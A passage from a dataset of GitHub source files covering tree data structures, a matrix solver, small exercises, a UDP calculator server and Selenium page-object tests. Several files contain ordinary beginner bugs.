vmhc\n","repo_name":"ZheweiMedia/DL_experiments","sub_path":"Outdated/Version0_CPAC/vmhc/vmhc.py","file_name":"vmhc.py","file_ext":"py","file_size_in_byte":17052,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"78"} +{"seq_id":"21660368869","text":"# Licensed under MIT License.\n# See LICENSE in the project root for license information.\n\n\"\"\"A simple CLI application.\"\"\"\n\nimport cmd\nfrom typing import Optional\n\nfrom forest import tree_exceptions\nfrom forest.binary_trees import avl_tree\nfrom forest.binary_trees import binary_search_tree\nfrom forest.binary_trees import binary_tree\nfrom forest.binary_trees import red_black_tree\nfrom forest.binary_trees import single_threaded_binary_trees\nfrom forest.binary_trees import double_threaded_binary_trees\nfrom forest.binary_trees import traversal\n\n\nclass cli(cmd.Cmd):\n \"\"\"A CLI for operating tree data structures.\"\"\"\n \n intro = \"Welcome to the Tree CLI. Type help or ? to list available commands.\\n\"\n prompt = \"tree> \"\n \n def __init__(self) -> None:\n cmd.Cmd.__init__(self)\n self._tree: Optional[binary_tree.BinaryTree] = None\n \n def do_build(self, line):\n \"\"\"Build a binary tree.\n \n Options: avl, bst, rb, threaded\n \n Example\n -------\n tree> build avl\n \"\"\"\n try:\n if self._tree is not None:\n print(f\"ERROR: A tree of type {type(self._tree)} already exists.\")\n return\n \n tree_type = self._get_single_arg(line=line).lower()\n if tree_type == \"avl\":\n self._tree = avl_tree.AVLTree()\n elif tree_type == \"bst\":\n self._tree == binary_search_tree.BinarySearchTree()\n elif tree_type == \"rb\":\n self._tree == red_black_tree.RBTree()\n elif tree_type == \"threaded\":\n threaded_type = input(\n \"Please input threaded BST type (left, right, double): \"\n ).lower()\n if threaded_type == \"left\":\n self._tree = single_threaded_binary_trees.LeftThreadedBinaryTree()\n elif threaded_type == \"right\":\n self._tree = single_threaded_binary_trees.RightThreadedBinaryTree()\n elif threaded_type == \"double\":\n self._tree = double_threaded_binary_trees.DoubleThreadedBinaryTree()\n else:\n print(f\"ERROR: {threaded_type} is an invalid threaded type.\")\n else:\n print(f\"ERROR: {tree_type} is an invalid tree type.\")\n except KeyError as error:\n print(error)\n \n def do_search(self, line):\n \"\"\"Search data by a given key.\n \n Example\n -------\n tree> search 3\n \"\"\"\n try:\n key = self._get_key(line=line)\n output = self._tree.search(key=key)\n if output is None:\n print(f\"ERROR: A node with key {key} does not exist.\")\n else:\n print(output.key, output.data)\n except KeyError as error:\n print(error)\n \n def do_insert(self, line):\n \"\"\"Insert a (key, data) pair. The key must be an integer.\n \n Example\n -------\n tree> insert 7 data\n \"\"\"\n args = line.split()\n # Note: the `insert` is not included in `args`.\n if len(args) != 2:\n print(\"ERROR: Invalid number of arguments: Two expected.\")\n return\n try:\n key = self._get_key(line=line)\n self._tree.insert(key=key, data=args[1])\n print(f\"(key, data) = ({args[0]}, {args[1]}) has been inserted.\")\n except tree_exceptions.DuplicateKeyError:\n print(f\"ERROR: A node with {key} already exists.\")\n except KeyError as error:\n print(error)\n \n def do_delete(self, line):\n \"\"\"Delete an item by the given key.\n \n Example\n -------\n tree> delete 5\n \"\"\"\n try:\n key = self._get_key(line=line)\n self._tree.delete(key=key)\n print(f\"Key {key} has been removed.\")\n except KeyError as error:\n print(error)\n \n def do_traverse(self, line):\n \"\"\"Traverse the binary tree.\n \n Options: pre, in, post, reverse\n \n Example\n -------\n tree> traverse pre\n \"\"\"\n try:\n arg = self._get_single_arg(line=line).lower()\n \n if isinstance(\n self._tree, single_threaded_binary_trees.LeftThreadedBinaryTree\n ):\n if arg == \"reverse\":\n for item in self._tree.reverse_inorder_traverse():\n print(item)\n else:\n print(f\"ERROR: {arg} is an invalid traversal type for this tree.\")\n elif isinstance(\n self._tree, single_threaded_binary_trees.RightThreadedBinaryTree\n ):\n if arg == \"pre\":\n for item in self._tree.preorder_traverse():\n print(item)\n elif arg == \"in\":\n for item in self._tree.inorder_traverse():\n print(item)\n else:\n print(f\"ERROR: {arg} is an invalid traversal type for this tree.\")\n elif isinstance(\n self._tree, double_threaded_binary_trees.DoubleThreadedBinaryTree\n ):\n if arg == \"pre\":\n for item in self._tree.preorder_traverse():\n print(item)\n elif arg == \"in\":\n for item in self._tree.inorder_traverse():\n print(item)\n elif arg == \"reverse\":\n for item in self._tree.reverse_inorder_traverse():\n print(item)\n else:\n print(f\"ERROR: {arg} is an invalid traversal type for this tree.\")\n elif isinstance(self._tree, red_black_tree.RBTree):\n if arg == \"pre\":\n for item in self._tree.preorder_traverse():\n print(item)\n elif arg == \"in\":\n for item in self._tree.inorder_traverse():\n print(item)\n elif arg == \"post\":\n for item in self._tree.postorder_traverse():\n print(item)\n else:\n print(f\"ERROR: {arg} is an invalid traversal type for this tree.\")\n else:\n # For avl and bst\n if arg == \"pre\":\n for item in traversal.preorder_traverse(tree=self._tree):\n print(item)\n elif arg == \"in\":\n for item in traversal.inorder_traverse(tree=self._tree):\n print(item)\n elif arg == \"post\":\n for item in traversal.postorder_traverse(tree=self._tree):\n print(item)\n elif arg == \"reverse\":\n for item in traversal.reverse_inorder_traverse(tree=self._tree):\n print(item)\n else:\n print(f\"ERROR: {arg} is an invalid traversal type.\")\n except KeyError as error:\n print(error)\n \n def do_display(self, line):\n \"\"\"Display the tree.\"\"\"\n if isinstance(self._tree.root, binary_tree.Node):\n if isinstance(\n self._tree, single_threaded_binary_trees.LeftThreadedBinaryTree\n ) or isinstance(\n self._tree, single_threaded_binary_trees.RightThreadedBinaryTree\n ) or isinstance(\n self._tree, double_threaded_binary_trees.DoubleThreadedBinaryTree\n ):\n self._tree.root.display_keys(self._tree)\n else:\n self._tree.root.display_keys()\n \n def do_destroy(self, line):\n \"\"\"Destroy the existing tree.\"\"\"\n self._tree = None\n print(\"The tree has been destroyed.\")\n \n def do_exit(self, line):\n \"\"\"Exit the application.\"\"\"\n print(\"Bye!\")\n raise SystemExit() \n \n def _get_single_arg(self, line):\n # Get only the only argument from the line of input.\n arg = line.split()\n if len(arg) > 1:\n raise KeyError(\"Too many arguments! Only one expected.\")\n return arg[0]\n \n def _get_key(self, line):\n # Get the key of a node from the line of input.\n arg = line.split()\n if len(arg) == 0:\n raise KeyError(\"ERROR: No argument provided!\")\n # str.isdigit() checks if str is made ONLY of digits\n if not arg[0].isdigit():\n raise KeyError(\"ERROR: The key must be an integer!\")\n else:\n return int(arg[0])\n\n\ndef main():\n \"\"\"Entry point for the tree CLI.\"\"\"\n cli().cmdloop()","repo_name":"justyre/jus","sub_path":"ag/forest/bin/tree_cli.py","file_name":"tree_cli.py","file_ext":"py","file_size_in_byte":8794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"15767033613","text":"given_matrix = []\r\n\r\n\r\n# Prints the given matrix\r\ndef show_matrix():\r\n for x in given_matrix:\r\n print(x)\r\n\r\n\r\n# gives a row that is multiplied by a given number\r\ndef multiply_row(row, constant):\r\n temp_row = []\r\n for x in row:\r\n temp_row.append(x * constant)\r\n return temp_row\r\n\r\n\r\n# Making the properly sized matrices with default values\r\nnum_rows = int(input(\"How many Rows ?\\n\"))\r\nnum_cols = int(input(\"How many Columns ?\\n\"))\r\ni = num_rows\r\nwhile i > 0:\r\n current_row_given = []\r\n j = num_cols\r\n while j > 0:\r\n current_row_given.append(\"_\")\r\n j -= 1\r\n given_matrix.append(current_row_given)\r\n i -= 1\r\n\r\n\r\n# Assigning values\r\ni = 0\r\nj = 0\r\nwhile i < num_rows:\r\n while j < num_cols:\r\n given_matrix[i][j] = '*'\r\n show_matrix()\r\n given_matrix[i][j] = float(input(\"Highlighted cell value: \"))\r\n j += 1\r\n j = 0\r\n i += 1\r\n\r\n\r\n# Solving\r\n# since dividing introduces a lot of error and it's difficult to store 2 numbers per cell\r\n# only multiply rows in the matrix, divide at the end\r\n\r\n# Getting to EF\r\n\r\n# current_col is the column that has a variable being eliminated\r\ncurrent_col = 0\r\nwhile current_col < num_cols:\r\n operating_row = current_col + 1\r\n coefficient_product = 1\r\n for x in given_matrix:\r\n coefficient_product *= x[current_col]\r\n multiplied_subtract = multiply_row(given_matrix[current_col], (coefficient_product / current_col[current_col]))\r\n while operating_row < len(given_matrix):\r\n # multiplied_row: variable going to 0\r\n multiplied_row = multiply_row(given_matrix[operating_row], (coefficient_product / current_col[operating_row]))\r\n given_matrix[operating_row] = multiplied_row - multiplied_subtract\r\n # ^ check this logic, syntax error ^\r\n operating_row += 1\r\n\r\n current_col += 1\r\n# need to use that to eliminate that col in all other rows\r\n\r\n\r\n# Tests\r\nprint(\"Matrix:\")\r\nshow_matrix()\r\ntest_row = [1.0, 2.0, 3.0]\r\nprint(\"Test row: \", test_row)\r\ntest_row = multiply_row(test_row, 3)\r\nprint(\"Modified row: \", test_row)\r\n","repo_name":"JacobzYan/FunProjects","sub_path":"WIP/MatrixSolver.py","file_name":"MatrixSolver.py","file_ext":"py","file_size_in_byte":2090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"22887861736","text":"\n\ndef find_value(head, key):\n if head is None:\n return None\n \n if head.key == key:\n return head.value\n\n if head.left is None and head.right is None:\n return\n\n if head.right is None:\n return find_value(head.left, key)\n \n if head.left is None:\n return find_value(head.right, key)\n \n if key < head.key:\n return find_value(head.left, key)\n\n return find_value(head.right, key)\n\n\n\nclass BinaryTree:\n def __init__(self) -> None:\n self.head = None\n\n def search(self, key):\n head = self.head\n return find_value(head, key)\n\n def insert(self, key, value):\n if self.head is None:\n self.head = Node(key, value)\n return self.head\n return insert_node(self.head, key, value)\n\n def delete(self, key):\n self.head = delete_element(self.head, key)\n \n def print_tree(self):\n print(\"==============\")\n self._print_tree(self.head, 0)\n print(\"==============\")\n\n def _print_tree(self, node, lvl):\n if node is not None:\n self._print_tree(node.right, lvl+5)\n\n print()\n print(lvl*\" \", node.key, node.value)\n\n self._print_tree(node.left, lvl + 5)\n\n def height(self):\n return find_height(self.head)\n\n\nclass Node:\n def __init__(self, key, value, left=None, right=None) -> None:\n self.key = key\n self.value = value\n self.left = left\n self.right = right\n \n def __str__(self) -> str:\n return f\"{self.key}: {self.value}\"\n\n\ndef find_height(node):\n if node is None:\n return 0\n \n leftHeight = find_height(node.left)\n rightHeight = find_height(node.right)\n\n if leftHeight > rightHeight:\n return 1 + leftHeight\n return 1 + rightHeight\n\n\nclass AVLNode(Node):\n def __init__(self, *args, **kwargs) -> None:\n super().__init__(*args, **kwargs)\n \n @property\n def left_height(self):\n return find_height(self.left)\n\n @property\n def right_height(self):\n return find_height(self.right)\n\n\ndef findMinValue(head):\n if head is None:\n return head\n \n if head.left is None:\n return head\n \n return findMinValue(head.left)\n\n\ndef delete_element(head, key):\n if head is None:\n return head\n \n if head.key > key:\n head.left = delete_element(head.left, key)\n return head\n \n if head.key < key:\n head.right = delete_element(head.right, key)\n return head\n\n if head.left is None:\n temp = head.right\n # head = None\n return temp\n \n if head.right is None:\n temp = head.left\n # head = None\n return temp\n \n temp = findMinValue(head.right)\n\n head.key = temp.key\n head.value = temp.value\n head.right = delete_element(head.right, temp.key)\n return head\n\n\ndef insert_node(head, key, value):\n if head is None:\n return AVLNode(key, value)\n \n if head.key == key:\n head.value = value\n return head\n\n if head.key > key:\n head.left = insert_node(head.left, key, value)\n return head\n \n if head.key < key:\n head.right = insert_node(head.right, key, value)\n return head\n\n\ndef resolve_left_imbalance(head):\n left_node = head.left\n\n # LL imbalance\n if left_node.left_height - left_node.right_height >= 0:\n left_right = left_node.right\n left_node.right = head\n head.left = left_right\n\n return left_node\n\n # LR imbalance\n new_head = left_node.right\n new_head_left = new_head.left\n new_head_right = new_head.right\n new_head.left = left_node\n new_head.right = head\n left_node.right = new_head_left\n head.left = new_head_right\n\n return new_head\n\n\ndef resolve_right_imbalance(head):\n right_node = head.right\n\n # RR imbalance\n if right_node.right_height - right_node.left_height >= 0:\n right_node_left = right_node.left\n right_node.left = head\n head.right = right_node_left\n return right_node\n\n # RL imbalance\n new_head = right_node.left\n new_head_left = new_head.left\n new_head_right = new_head.right\n new_head.left = head\n new_head.right = right_node\n\n right_node.left = new_head_right\n head.right = new_head_left\n\n return new_head\n\n\ndef find_imbalance(head):\n if head.right_height < 2 and head.left_height < 2:\n return head\n\n if head.left_height - head.right_height == 2:\n head = resolve_left_imbalance(head)\n\n if head.right_height - head.left_height == 2:\n head = resolve_right_imbalance(head)\n \n if head.left is not None:\n head.left = find_imbalance(head.left)\n \n if head.right is not None:\n head.right = find_imbalance(head.right)\n \n return head\n\n\nclass AVLTree(BinaryTree):\n def __init__(self) -> None:\n super().__init__()\n \n def insert(self, key, value):\n if self.head is None:\n self.head = AVLNode(key, value)\n insert_node(self.head, key, value)\n self.head = find_imbalance(self.head)\n\n def delete(self, key):\n super().delete(key)\n if self.head.left_height - self.head.right_height == 2:\n self.head = resolve_left_imbalance(self.head)\n\n if self.head.right_height - self.head.left_height == 2:\n self.head = resolve_right_imbalance(self.head)\n\n\nif __name__ == \"__main__\":\n tree = AVLTree()\n tree.insert(50, 'A')\n tree.insert(15, 'B')\n tree.insert(62, 'C')\n tree.insert(20, 'D')\n tree.insert(25, 'D')\n tree.insert(2, 'E')\n tree.insert(1, 'F')\n tree.insert(11, 'G')\n tree.insert(100, 'H')\n tree.insert(7, 'I')\n tree.insert(6, 'J')\n tree.insert(55, 'K')\n tree.insert(52, 'L')\n tree.insert(51, 'M')\n tree.insert(57, 'N')\n tree.insert(8, 'O')\n tree.insert(9, 'P')\n tree.insert(10, 'R')\n tree.insert(99, 'S')\n tree.insert(12, 'T')\n tree.print_tree()\n # Wyswietl klucz: wartosc\n tree.search(10)\n tree.delete(50)\n tree.delete(52)\n tree.delete(11)\n tree.delete(57)\n tree.delete(1)\n tree.delete(12)\n tree.insert(3, 'AA')\n tree.insert(4, 'BB')\n tree.delete(7)\n tree.delete(8)\n tree.print_tree()\n # Wyswietl klucz: wartosc\n","repo_name":"djmmatracki/AlgorithmsAndDataStrutures","sub_path":"AVLTrees/AVL_trees.py","file_name":"AVL_trees.py","file_ext":"py","file_size_in_byte":6287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"10359323792","text":"from socket import *\nimport re\nimport random\n#assign port number\nserverPort = 12000\n#UDP socket creation\nserverSocket = socket(AF_INET, SOCK_DGRAM)\n#bind port to socket\nserverSocket.bind(('', serverPort))\nprint (\"The server is ready to receive\\n\")\nwhile True:\n #message recieved in format \"n[operation]n [probability of dropping packet in decimal format]\"\"\n messagercv, clientAddress = serverSocket.recvfrom(2048)\n #split up message to extract parts\n rcvdecarr = messagercv.split(\" \")\n\n if(len(rcvdecarr) == 2):\n #in index 1 that is the probability of dropping the packetr decimal\n rcvdec = rcvdecarr[1]\n #delete probability of dropping the packet from the array because you already stored it\n rcvdecarr.pop(1)\n #turn array now with only the numbers and operation code in it back into a string to be processed for calculation\n message = ''.join(rcvdecarr)\n #convert string decimal to decimal\n isfloat = True\n #only processed if decimal formal is valid\n try:\n decimalrcv = float(rcvdec)\n except ValueError:\n isfloat = False\n #make sure value is float\n randompick = 0\n if(isfloat == True):\n #[float(x.strip(' \"')) for x in rcvdec]\n #deal with entering values over 1.0 ie: more than 100% chance of package dropping\n if(decimalrcv > 1.0):\n decimalrcv = 1.0\n #convert to percent\n dropzero = decimalrcv * 100\n #100%-probability of dropping paacket = probability of not dropping a packet\n dropone = 100-dropzero\n #make array of (probability of dropping)* #0s and (probability of not dropping)*#1s\n my_list = [1] * int(dropone) + [0] * int(dropzero)\n #pick random item from list\n randompick = random.choice(my_list)\n #bellow what you would do if 50% probability of dropping packets\n #randompick = int(random.randint(0, 1))\n #if you picked one packet was not dropped you may processed\n #if value not float ensure loop doesnt execute\n else:\n modifiedMessage = -1\n print(\"!!!!!!!!!!incorrect decimal!!!!!!!!!!\\n\")\n print (\"<<-- At Server modified message to send back: '\"+ \"-1 \\n\" + \"status code 300\" + \"'\\n\")\n #message sent back in format of [result] [status code]\n serverSocket.sendto(\"-1 300\", clientAddress)\n if(randompick == 1):\n print (\"-->> At Server receved message is: '\" + message.decode() + \"'\")\n print (\" -->> clientAddress is: \" , str(clientAddress[0]) + \"/\" + str(clientAddress[1]) )\n splitmsg = re.split(\"([+-/*])\", message.replace(\" \", \"\"))\n #i used penalties to keep track of number or operation errors in client message\n penalties = 0\n #if the length of the array is more than 3 there is an issue its not in format number operator number\n if(not(len(splitmsg)==3)):\n penalties = penalties + 1\n print(\"!!!!!!!!!!invalid input!!!!!!!!!!\\n\")\n print (\"<<-- At Server modified message to send back: '\" + \"status code 300\" + \"'\\n\")\n #message sent back in format of [result] [status code]\n serverSocket.sendto(\"-1 300\", clientAddress)\n else:\n #number(not a number) operator number\n if((splitmsg[0]).isdigit() == False):\n penalties = penalties + 1\n print(\"!!!!!!!!!!invalid first input not correct length!!!!!!!!!!\\n\")\n print (\"<<-- At Server modified message to send back: '\"+ \"-1 \\n\" + \"status code 300\" + \"'\\n\")\n #message sent back in format of [result] [status code]\n serverSocket.sendto(\"-1 300\", clientAddress)\n #number operator number(not a number)\n if((splitmsg[2]).isdigit() == False):\n penalties = penalties + 1\n print(\"!!!!!!!!!!invalid second input!!!!!!!!!!\\n\")\n print (\"<<-- At Server modified message to send back: '\"+ \"-1 \\n\" + \"status code 300\" + \"'\\n\")\n #message sent back in format of [result] [status code]\n serverSocket.sendto(\"-1 300\", clientAddress)\n #number operator(not an operator) number\n if(not(splitmsg[1] == '-' or splitmsg[1] == '+' or splitmsg[1] == '*' or splitmsg[1] == '/')):\n penalties = penalties + 1\n print(\"!!!!!!!!!!invalid operation input!!!!!!!!!!\\n\")\n print (\"<<-- At Server modified message to send back: '\"+ \"-1 \\n\" + \"status code 300\" + \"'\\n\")\n #message sent back in format of [result] [status code]\n serverSocket.sendto(\"-1 300\", clientAddress)\n\n #message input violates no restrictions above\n if(penalties == 0):\n operator = splitmsg[1]\n #if subtract\n if operator == '-' :\n modifiedMessage = str(int(splitmsg[0]) - int(splitmsg[2]))\n print (\"<<-- At Server modified message to send back: '\" + modifiedMessage + \"'\\n\"+ \"status code 200\" + \"'\\n\")\n #message sent back in format of [result] [status code]\n serverSocket.sendto(str(modifiedMessage+\" 200\"), clientAddress)\n #if add\n if operator == '+' :\n modifiedMessage = str(int(splitmsg[0]) + int(splitmsg[2]))\n print (\"<<-- At Server modified message to send back: '\" + modifiedMessage + \"'\\n\"+ \"status code 200\" + \"'\\n\")\n #message sent back in format of [result] [status code]\n serverSocket.sendto(str(modifiedMessage+\" 200\"), clientAddress)\n #if multiply\n if operator == '*' :\n modifiedMessage = str(int(splitmsg[0]) * int(splitmsg[2]))\n print (\"<<-- At Server modified message to send back: '\" + modifiedMessage + \"'\\n\"+ \"status code 200\" + \"'\\n\")\n #message sent back in format of [result] [status code]\n serverSocket.sendto(str(modifiedMessage+\" 200\"), clientAddress)\n #if divide but not zero\n if ((operator == '/') and (not (int(splitmsg[2]) == 0)) ):\n modifiedMessage = str(int(splitmsg[0]) / int(splitmsg[2]))\n print (\"<<-- At Server modified message to send back: '\" + modifiedMessage + \"'\\n\"+ \"status code 200\" + \"'\\n\")\n #message sent back in format of [result] [status code]\n serverSocket.sendto(str(modifiedMessage+\" 200\"), clientAddress)\n #if divide by zero then not valid operation\n if((operator == '/') and (int(splitmsg[2]) == 0)):\n modifiedMessage = -1\n print(\"!!!!!!!!!!divide by 0!!!!!!!!!!\\n\")\n print (\"<<-- At Server modified message to send back: '\"+ \"-1 \\n\" + \"status code 300\" + \"'\\n\")\n #message sent back in format of [result] [status code]\n serverSocket.sendto(\"-1 300\", clientAddress)\n else:\n modifiedMessage = -1\n print(\"!!!!!!!!!!incorrect format!!!!!!!!!!\\n\")\n print (\"<<-- At Server modified message to send back: '\"+ \"-1 \\n\" + \"status code 300\" + \"'\\n\")\n #message sent back in format of [result] [status code]\n serverSocket.sendto(\"-1 300\", clientAddress)\n","repo_name":"artarazavi/UDP-TCP-servers","sub_path":"UDPServer.py","file_name":"UDPServer.py","file_ext":"py","file_size_in_byte":7670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74564807930","text":"# Author : Pavankumar Hegde\n# Question : Swap Two Numbers\n# Question Link : https://www.codingninjas.com/codestudio/guided-paths/basics-of-python/content/118790/offering/1461386?leftPanelTab=0\n# Solution \n\n'''\n Time complexity: O(1)\n Space complexity: O(1).\n'''\n\ndef swap(a, b):\n temp = 0\n # Store the value of a in temp.\n temp = a\n # Make a equal to b.\n a = b\n # Make b equal to temp.\n b = temp\n \n return a, b","repo_name":"hegdepavankumar/Coding_Ninjas_CodeStudio_Answers","sub_path":"Python_Programs/Question3.py","file_name":"Question3.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"78"} +{"seq_id":"70614980731","text":"P1 = input()\nid_1, unit_1, price_1 = P1.split()\n\nP2 = input()\nid_2, unit_2, price_2 = P2.split()\n\nid_1=int(id_1)\nunit_1=int(unit_1)\nprice_1=float(price_1)\n\nid_2=int(id_2)\nunit_2=int(unit_2)\nprice_2=float(price_2)\n\nMedia = (unit_1*price_1) + (unit_2*price_2)\nformat_float = \"{:.2f}\".format(Media)\nprint(\"VALOR A PAGAR: R$ \"+str(format_float))\n","repo_name":"hasibkyau/Samsung_Job_Preperation","sub_path":"beecrowd/1_Beginner/Python/1010_Simple_Calculator.py","file_name":"1010_Simple_Calculator.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"5287059861","text":"import datetime\nimport pandas as pd\nfrom selenium.webdriver.support.ui import Select\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\nfrom .RepeatTransaction import RepeatTransaction\nfrom functional_tests.TestCase import wait_for\n\nstrptime = datetime.datetime.strptime\n\nclass HomePage:\n\n def __init__(self, driver, server_url=None, start=None, end=None):\n\n self.driver = driver\n self.server_url = server_url\n\n if start is not None and end is not None:\n url = '{}/home?start={}&end={}'.format(self.server_url, start, end)\n self.driver.get(url)\n \n self.balance_chart = BalanceChart(driver)\n self.transaction_form = TransactionForm(driver)\n self.menu = Menu(driver)\n self.transaction_list = TransactionList(driver)\n self.repeat_transactions_list = RepeatTransactionsList(driver)\n self.date_selector = DateSelector(driver.find_element_by_id('date-selector'))\n self.week_forward_button = driver.find_element_by_id('week-forward-button')\n self.week_backward_button = driver.find_element_by_id('week-backward-button')\n self.date_range = self.get_date_range()\n self.transactions_tab = driver.find_element_by_id('transactions-tab')\n self.repeat_transactions_tab = driver.find_element_by_id('repeat-transactions-tab')\n \n def create_transaction(self, update=True, *args, **kwargs):\n self.transaction_form.create_transaction(*args, **kwargs)\n if update == True:\n self.__init__(self.driver)\n\n def get_balances(self):\n values = [(b.date, b.balance) for b in self.balance_chart.bars]\n df_balances = pd.DataFrame(values, columns=['date', 'balance'])\n df_balances = df_balances.set_index('date')\n df_balances.index = pd.to_datetime(df_balances.index)\n return df_balances\n \n def move_date_range_forward(self, days=7):\n if days == 7:\n self.week_forward_button.click()\n else:\n raise Exception('unknown days attribute: {}'.format(days))\n\n def move_date_range_backward(self, days=7):\n if days == 7:\n self.week_backward_button.click()\n else:\n raise Exception('unknown days attribute: {}'.format(days))\n\n def get_date_range(self):\n start_input = self.driver.find_element_by_css_selector('#date-selector #start-input')\n end_input = self.driver.find_element_by_css_selector('#date-selector #end-input')\n start = strptime(start_input.get_attribute('value'), '%Y-%m-%d').date()\n end = strptime(end_input.get_attribute('value'), '%Y-%m-%d').date()\n return [start, end]\n\n def show_repeat_transactions_view(self):\n self.repeat_transactions_tab.click()\n WebDriverWait(self.driver, 120).until(\n EC.visibility_of_element_located((By.ID, 'repeat-transactions'))\n )\n\n def show_transactions_view(self):\n self.transactions_tab.click()\n WebDriverWait(self.driver, 10).until(\n EC.visibility_of_element_located((By.ID, 'transactions'))\n )\n\n def get_repeat_transactions(self):\n rts = []\n class_name = RepeatTransaction.CLASS_NAME\n for e in self.driver.find_elements_by_css_selector('.{}'.format(class_name)):\n rts.append(RepeatTransaction(e, self.driver))\n return rts\n\n def wait_for_repeat_transaction_prompt(self, timeout):\n wait_for(RepeatTransaction.PROMPT_ID, driver=self.driver, timeout=timeout, by='id')\n\n def get_transactions(self):\n return self.transaction_list.get_transactions()\n\n def reload(self):\n self.__init__(self.driver)\n return self\n\nclass TransactionForm:\n\n def __init__(self, driver):\n\n self.driver = driver\n self.element = driver.find_element_by_id('transaction-form')\n css_selector = '#date-input[form=\"transaction-form\"]'\n self.date_input = driver.find_element_by_css_selector(css_selector)\n css_selector = '#transaction-size-input[form=\"transaction-form\"]'\n self.transaction_size_input = driver.find_element_by_css_selector(css_selector)\n css_selector = '#description-input[form=\"transaction-form\"]'\n self.description_input = driver.find_element_by_css_selector(css_selector)\n css_selector = '#submit-button[form=\"transaction-form\"]'\n self.submit_button = driver.find_element_by_css_selector(css_selector)\n self.repeat_checkbox = driver.find_element_by_id('repeat-checkbox')\n self.repeat_options = RepeatOptions(self.driver)\n\n def create_transaction(\n self,\n date,\n size,\n description=\"\",\n repeats='does_not_repeat',\n ends=None,\n steps=None,\n frequency=None):\n \n self.date = date\n self.transaction_size_input.send_keys(size)\n self.description_input.send_keys(description)\n if repeats == 'does_not_repeat':\n if self.repeat_checkbox.is_selected():\n self.repeat_checkbox.click()\n self.submit_button.click()\n else:\n if not self.repeat_checkbox.is_selected():\n self.repeat_checkbox.click()\n self.set_repeat_frequency(repeats, steps)\n self.set_end_criteria(ends)\n self.repeat_options.submit()\n\n @property\n def date(self):\n return strptime(self.date_input.get_attribute('value'), '%Y-%m-%d').date()\n\n @date.setter\n def date(self, date):\n keys = '{:02d}{:02d}{}'.format(date.day, date.month, date.year) \n self.date_input.send_keys(keys)\n\n @property\n def transaction_size(self):\n return float(self.transaction_size_input.get_attribute('value'))\n\n @transaction_size.setter\n def transaction_size(self, transaction_size):\n self.transaction_size_input.send_keys(transaction_size)\n\n @property\n def description(self):\n return float(self.description_input.get_attribute('value'))\n\n @description.setter\n def description(self, description):\n self.description_input.send_keys(description)\n\n def submit(self):\n WebDriverWait(self.driver, 10).until(\n EC.invisibility_of_element_located((By.ID, 'repeat-options-div'))\n )\n self.submit_button.click()\n\n def set_repeat_frequency(self, frequency, steps=1):\n self.repeat_options.set_frequency(frequency, steps)\n\n def set_end_criteria(self, ends):\n self.repeat_options.set_end_criteria(ends)\n \nclass Menu:\n\n def __init__(self, driver):\n self.element = driver.find_element_by_id('menu')\n self.sign_out_button = driver.find_element_by_id('sign-out')\n\nclass TransactionList:\n\n def __init__(self, driver):\n\n self.element = driver.find_element_by_id('transaction-list')\n self.date_header = self.element.find_element_by_id('date-header')\n self.transaction_size_header = self.element.find_element_by_id('transaction-size-header')\n self.description_header = self.element.find_element_by_id('description-header')\n self.closing_balance_header = self.element.find_element_by_id('closing-balance-header')\n\n def get_transactions(self):\n transactions = []\n for e in self.element.find_elements_by_css_selector('.transaction'):\n transactions.append(Transaction(e))\n return transactions\n\nclass BalanceChart:\n\n def __init__(self, driver):\n self.element = driver.find_element_by_id('balance-chart')\n self.canvas = self.element.find_element_by_id('canvas')\n self.x_axis = self.canvas.find_element_by_id('x-axis')\n self.y_axis = self.canvas.find_element_by_id('y-axis')\n self.plot_area = self.canvas.find_element_by_id('plot-area')\n WebDriverWait(self.element, 10).until(\n EC.presence_of_element_located((By.CSS_SELECTOR, '.bar'))\n )\n self.bars = [BalanceBar(element) for element in self.plot_area.find_elements_by_css_selector('.bar')]\n self.y_ticks = self.y_axis.text.split('\\n')\n self.x_ticks = self.x_axis.text.split('\\n')\n\nclass BalanceBar:\n\n def __init__(self, element):\n self.element = element\n self.balance = float(self.element.get_attribute('balance'))\n self.date = datetime.datetime.strptime(self.element.get_attribute('date'), '%Y-%m-%d').date()\n\nclass Transaction:\n\n def __init__(self, element):\n self.element = element\n self.date_input = self.element.find_element_by_css_selector('.date-input')\n self.size_input = self.element.find_element_by_css_selector('.transaction-size-input')\n self.description_input = self.element.find_element_by_css_selector('.description-input')\n self.balance_element = self.element.find_element_by_css_selector('.transaction-balance')\n self.id = self.element.find_element_by_css_selector('.id')\n self.save_button = self.element.find_element_by_css_selector('.save-transaction-button')\n self.delete_button = self.element.find_element_by_css_selector('.delete-transaction-button')\n \n @property\n def date(self):\n return datetime.datetime.strptime(self.date_input.get_attribute('value'), '%Y-%m-%d').date()\n\n @date.setter\n def date(self, date):\n keys = '{:02d}{:02d}{}'.format(date.day, date.month, date.year) \n self.date_input.send_keys(keys)\n\n @property\n def size(self):\n return float(self.size_input.get_attribute('value'))\n\n @size.setter\n def size(self, size):\n self.size_input.clear()\n self.size_input.send_keys(size)\n\n @property\n def description(self):\n return self.description_input.get_attribute('value')\n\n @description.setter\n def description(self, description):\n self.description_input.clear()\n self.description_input.send_keys(description)\n\n @property\n def balance(self):\n return self.balance_element.text\n\n def save(self):\n # WebDriverWait(self.element, 10).until(\n # lambda x: self.save_button.is_displayed\n # )\n self.save_button.click()\n\n def delete(self):\n self.delete_button.click()\n\n\nclass DateSelector:\n\n def __init__(self, element):\n self.element = element\n self.start_input = self.element.find_element_by_id('start-input')\n self.end_input = self.element.find_element_by_id('end-input')\n self.submit_button = self.element.find_element_by_css_selector('input[type=\"submit\"]')\n\n @property\n def start(self):\n return datetime.datetime.strptime(self.start_input.get_attribute('value'), '%Y-%m-%d').date()\n\n @start.setter\n def start(self, date):\n keys = '{:02d}{:02d}{}'.format(date.day, date.month, date.year) \n 